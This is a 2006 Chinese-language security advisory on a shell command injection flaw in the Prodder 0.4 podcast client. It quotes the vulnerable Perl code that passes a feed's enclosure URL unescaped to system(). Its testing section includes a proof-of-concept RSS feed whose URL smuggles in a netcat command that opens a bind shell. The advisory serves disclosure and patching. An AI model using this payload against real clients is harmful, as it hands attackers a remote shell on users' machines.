Prodder任意Shell命令执行漏洞
发布日期:2006-05-22
更新日期:2006-05-22
受影响系统:Prodder Prodder 0.4
不受影响系统:Prodder Prodder 0.5
描述:
BUGTRAQ ID:
18068
Prodder是用Perl编写的基于命令行的Podcast客户端。
Prodder的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在客户端机器上执行任意命令。
在使用prodder获取媒体文件索引时,prodder会从服务器所提供的XML文件获取媒体文件的URL,然后使用wget获取文件。源码类似于:
[...]
446 # Actually get the file
447 my $wget_cmd = "wget -qc -a '$conf{'errorfile'}' "
448 . "--tries=3 --timeout=20 --random-wait '$enc_url' -P '$outdir'";
449
450 # Background the wgets if needed - this will assume
451 # the downloads dont fail (once they've started)
452 $wget_cmd .= " --background" if $conf{'background'};
453
454
455
456 print "Fetching item ($enc_url)... ";
457 if (! system($wget_cmd))
[...]
但没有正确的过滤448行的$enc_url,因此攻击者可以在URL中包含任意Shell命令然后使脚本调用system()执行。
<*来源:RedTeam (
http://www.redteam-pentesting.de/)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=114832106316234&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>
<item>
<enclosure url="
http://www.example.com/example.mp3'; nc -e /bin/sh -l
-p 1337 & ';#'"
length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>
建议:
厂商补丁:
Prodder
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://prdownloads.sourceforge.net/prodder/prodder-0.5.tgz?download浏览次数:3032
严重程度:0(网友投票)